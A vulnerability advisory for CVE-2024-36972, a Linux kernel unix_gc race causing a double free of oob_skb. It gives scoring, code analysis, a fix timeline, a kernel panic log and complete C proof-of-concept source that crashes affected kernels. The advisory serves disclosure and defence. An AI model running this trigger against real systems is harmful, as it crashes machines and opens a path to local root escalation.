(CVE-2024-36972) Linux Kernel Race Condition in unix_gc on oob_skb Leading to Double Free
CVE: CVE-2024-36972
Affected Versions: Linux kernel >= 6.8 (introduced by commit 1279f9d9, 3 Feb 2024)
CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
| Product | Linux Kernel |
|---|---|
| Vendor | Linux |
| Severity | High — local attackers may exploit this vulnerability to elevate privileges to root |
| Affected Versions | Linux kernel >= 6.8 (upstream), introduced by commit 1279f9d9 (3 Feb 2024) |
| CVE Identifier | CVE-2024-36972 |
| CVE Description | A race condition in the Linux kernel unix socket garbage collector (unix_gc) leads to a double free of oob_skb (and a subsequent use-after-free), which can be exploited to achieve local privilege escalation |
| CWE Classification(s) | CWE-415: Double Free |
CVSS3.1 Scoring System
Base Score: 7.8 (High)
Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector (AV) | Local |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | Low |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |
Description of the vulnerability
The vulnerability was introduced by commit 1279f9d9 (af_unix: Call kfree_skb() for dead unix_(sk)->oob_skb in GC), which caused unix_gc to free oob_skb without holding unix_state_lock:
void unix_gc(void)
{
...
list_for_each_entry(u, &gc_candidates, link) {
scan_children(&u->sk, inc_inflight, &hitlist);
#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
if (u->oob_skb) {
kfree_skb(u->oob_skb);
u->oob_skb = NULL;
}
#endif
}
A peer unix socket can concurrently acquire the lock and modify oob_skb via queue_oob:
static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
struct scm_cookie *scm, bool fds_sent)
{
...
unix_state_lock(other);
if (sock_flag(other, SOCK_DEAD) ||
(other->sk_shutdown & RCV_SHUTDOWN)) {
unix_state_unlock(other);
kfree_skb(skb);
return -EPIPE;
}
maybe_add_creds(skb, sock, other);
skb_get(skb);
if (ousk->oob_skb)
consume_skb(ousk->oob_skb);
WRITE_ONCE(ousk->oob_skb, skb);
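Because unix_gc reads and frees u->oob_skb without taking the lock that queue_oob holds, the two paths can race on the same oob_skb: unix_gc calls kfree_skb() on it while queue_oob calls consume_skb() on it, so the same skb is released twice. This double free leads to a kernel panic (see the proof of concept below). A local attacker with low privileges can exploit it to achieve local privilege escalation to root.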
Proof of Concept
billy@VM:~$ uname -a
Linux VM 6.9.0-rc7 #1 SMP PREEMPT_DYNAMIC Mon May 6 09:32:43 CST 2024 x86_64 x86_64 x86_64 GNU/Linux
billy@VM:~$ ./a.out
[ 22.254056] BUG: kernel NULL pointer dereference, address: 0000000000000008
[ 22.255997] #PF: supervisor write access in kernel mode
[ 22.257517] #PF: error_code(0x0002) - not-present page
[ 22.258851] PGD 0 P4D 0
[ 22.259677] Oops: 0002 [#1] PREEMPT SMP PTI
[ 22.260776] CPU: 0 PID: 136 Comm: kworker/0:4 Not tainted 6.9.0-rc7 #1
[ 22.262280] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 22.264299] Workqueue: events delayed_fput
[ 22.265177] RIP: 0010:skb_dequeue+0x52/0x90
[ 22.266129] Code: 39 dc 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 <48> 89 42 08 48 89 10 e8 b2 51 47 00 4c 89 e0 5b 5d 41 5c c3c
[ 22.270059] RSP: 0018:ffffc900006afd50 EFLAGS: 00010002
[ 22.270961] RAX: 0000000000000000 RBX: ffff88810c4fd4a8 RCX: 0000000000000000
[ 22.272393] RDX: 0000000000000000 RSI: 0000000000000202 RDI: ffff88810c4fd4bc
[ 22.274157] RBP: ffff88810c4fd4bc R08: ffff88810c4fd97c R09: ffff88810b230080
[ 22.275606] R10: 0000000000000008 R11: 0000000000000000 R12: ffff88810182a700
[ 22.276852] R13: ffff88810c4fd800 R14: 0000000000000001 R15: ffff88810c4fd480
[ 22.278124] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 22.279580] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.280701] CR2: 0000000000000008 CR3: 0000000104e58000 CR4: 00000000000006f0
[ 22.282315] Call Trace:
[ 22.282990] <TASK>
[ 22.283544] ? __die_body+0x1f/0x70
[ 22.284292] ? page_fault_oops+0x15c/0x470
[ 22.285256] ? search_extable+0x26/0x30
[ 22.286379] ? search_bpf_extables+0x63/0x90
[ 22.287337] ? fixup_exception+0x26/0x330
[ 22.288325] ? exc_page_fault+0x81/0x170
[ 22.289299] ? asm_exc_page_fault+0x26/0x30
[ 22.290173] ? skb_dequeue+0x52/0x90
[ 22.290902] unix_release_sock+0x252/0x410
[ 22.291976] unix_release+0x32/0x50
[ 22.292721] __sock_release+0x3d/0xc0
[ 22.293465] sock_close+0x15/0x20
[ 22.294216] __fput+0x9d/0x2c0
[ 22.295047] delayed_fput+0x23/0x30
[ 22.296886] process_scheduled_works+0xd7/0x3f0
[ 22.297731] worker_thread+0x114/0x280
[ 22.298752] ? __pfx_worker_thread+0x10/0x10
[ 22.299500] kthread+0xe2/0x110
[ 22.300311] ? __pfx_kthread+0x10/0x10
[ 22.301890] ret_from_fork+0x34/0x50
[ 22.302670] ? __pfx_kthread+0x10/0x10
[ 22.303210] ret_from_fork_asm+0x1a/0x30
[ 22.303972] </TASK>
[ 22.304635] Modules linked in:
[ 22.305605] CR2: 0000000000000008
[ 22.306566] ---[ end trace 0000000000000000 ]---
[ 22.307599] RIP: 0010:skb_dequeue+0x52/0x90
[ 22.308566] Code: 39 dc 74 3e 8b 43 10 48 89 ef 83 e8 01 89 43 10 49 8b 44 24 08 49 c7 44 24 08 00 00 00 00 49 8b 14 24 49 c7 04 24 00 00 00 00 <48> 89 42 08 48 89 10 e8 b2 51 47 00 4c 89 e0 5b 5d 41 5c c3c
[ 22.310759] RSP: 0018:ffffc900006afd50 EFLAGS: 00010002
[ 22.311963] RAX: 0000000000000000 RBX: ffff88810c4fd4a8 RCX: 0000000000000000
[ 22.313668] RDX: 0000000000000000 RSI: 0000000000000202 RDI: ffff88810c4fd4bc
[ 22.315178] RBP: ffff88810c4fd4bc R08: ffff88810c4fd97c R09: ffff88810b230080
[ 22.316860] R10: 0000000000000008 R11: 0000000000000000 R12: ffff88810182a700
[ 22.318745] R13: ffff88810c4fd800 R14: 0000000000000001 R15: ffff88810c4fd480
[ 22.320376] FS: 0000000000000000(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 22.321906] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 22.323009] CR2: 0000000000000008 CR3: 0000000104e58000 CR4: 00000000000006f0
[ 22.324557] Kernel panic - not syncing: Fatal exception
[ 22.326468] Kernel Offset: disabled
[ 22.327599] ---[ end Kernel panic - not syncing: Fatal exception ]---
Source Code
#define _GNU_SOURCE
#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
/*
 * SYSCHK(x) - evaluate x exactly once and abort if it is the -1 failure value.
 *
 * The macro evaluates to the value of x. If that value compares equal to -1
 * converted to the type of x, err(3) prints "SYSCHK(<expression>)" followed
 * by the errno description and the process exits with status 1.
 *
 * Implementation notes:
 *  - Relies on a GNU statement expression ({ ... }).
 *  - Uses __typeof__ rather than typeof so the macro also builds in strict
 *    ISO modes (e.g. -std=c11), where the plain keyword is not available.
 *  - The temporary avoids the reserved "__" identifier prefix.
 */
#define SYSCHK(x)                                     \
	({                                            \
		__typeof__(x) syschk_res_ = (x);      \
		if (syschk_res_ == (__typeof__(x))-1) \
			err(1, "SYSCHK(" #x ")");     \
		syschk_res_;                          \
	})
/* Payload source: used as iov_base in send_fd() and as the data for the MSG_OOB send() calls in main(). Never written by this program. */
char buf[0x1000];
/* Scratch buffer for ancillary data; send_fd() zeroes it and builds its cmsghdr in place on every call. */
char send_buf[0x1000];
/* Barrier initialised with a count of 2 in main(); main() and job() meet on it through barrier(). */
pthread_barrier_t barr;
static void barrier(void)
{
int ret = pthread_barrier_wait(&barr);
assert(!ret || ret == PTHREAD_BARRIER_SERIAL_THREAD);
}
/*
 * send_fd - pass one file descriptor across a unix socket.
 *
 * @ufd: socket to send on.
 * @fd:  descriptor to attach as SCM_RIGHTS ancillary data.
 *
 * Sends a single payload byte taken from the global `buf`, with one
 * SOL_SOCKET/SCM_RIGHTS control message built in the global `send_buf`.
 *
 * Returns 0 on success. A sendmsg() failure does not return: SYSCHK()
 * reports it and exits the process.
 */
int send_fd(int ufd, int fd)
{
	struct iovec iov[] = {{.iov_base = buf, .iov_len = 1}};
	struct msghdr msg = {0};
	struct cmsghdr *cmsg;
	size_t len = CMSG_LEN(sizeof(fd));

	/* Start from a clean control buffer on every call. */
	memset(send_buf, 0, sizeof(send_buf));
	cmsg = (void *)send_buf;
	cmsg->cmsg_len = len;
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	/* memcpy instead of a cast store: CMSG_DATA() carries no alignment promise. */
	memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

	msg.msg_iov = iov;
	msg.msg_iovlen = 1;
	msg.msg_control = cmsg;
	msg.msg_controllen = len;

	SYSCHK(sendmsg(ufd, &msg, 0));
	return 0;
}
/*
 * Thread body for the helper thread started from main(); never returns.
 *
 * Each iteration is bracketed by two barrier() rendezvous with main().
 * Between them it creates an AF_UNIX stream socket and closes it again.
 * NOTE(review): presumably the close() is what kicks the kernel's unix_gc
 * while main() issues its racing MSG_OOB send - confirm against the kernel.
 *
 * @x: unused thread argument.
 */
void *job(void *x)
{
	for (;;) {
		int sk;

		barrier();
		sk = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
		close(sk);
		barrier();
	}
}
/*
 * PoC driver: loops forever trying to hit the unix_gc / queue_oob race.
 *
 * Setup: initialise the two-party barrier, ignore SIGPIPE, and start the
 * job() thread. Any setup failure is fatal, because without the helper
 * thread the first barrier() call below would block forever.
 *
 * The function never returns normally; the process ends through err()/errx()
 * or when the kernel crashes.
 */
int main(int argc, char **argv)
{
	int cfd[2];
	pthread_t tid;
	int rc;

	(void)argc;
	(void)argv;

	/* pthread functions return an error number instead of setting errno. */
	rc = pthread_barrier_init(&barr, NULL, 2);
	if (rc)
		errx(1, "pthread_barrier_init: %s", strerror(rc));

	if (signal(SIGPIPE, SIG_IGN) == SIG_ERR)
		err(1, "signal(SIGPIPE)");

	rc = pthread_create(&tid, NULL, job, NULL);
	if (rc)
		errx(1, "pthread_create: %s", strerror(rc));

	while (1) {
		SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
		/* Queue an out-of-band byte for the peer, cfd[0]. */
		SYSCHK(send(cfd[1], buf, 1, MSG_OOB));
		/* Send cfd[0] to itself as SCM_RIGHTS data, then drop our reference. */
		send_fd(cfd[1], cfd[0]);
		close(cfd[0]);
		barrier();
		/*
		 * Racing send: runs while job() creates and closes its socket.
		 * The result is deliberately not checked; failure is acceptable here.
		 */
		send(cfd[1], buf, 1, MSG_OOB);
		barrier();
		close(cfd[1]);
	}
}
Timeline
- 2024-02-03 — Vulnerability introduced upstream: 1279f9d9 (af_unix: Call kfree_skb() for dead unix_(sk)->oob_skb in GC)
- 2024-05-07 — Reported to Linux Kernel Security Team
- 2024-05-16 — Fix committed upstream: 9841991a (af_unix: Update unix_sk(sk)->oob_skb under sk_receive_queue lock)
- 2024-06-21 — CVE-2024-36972 assigned and published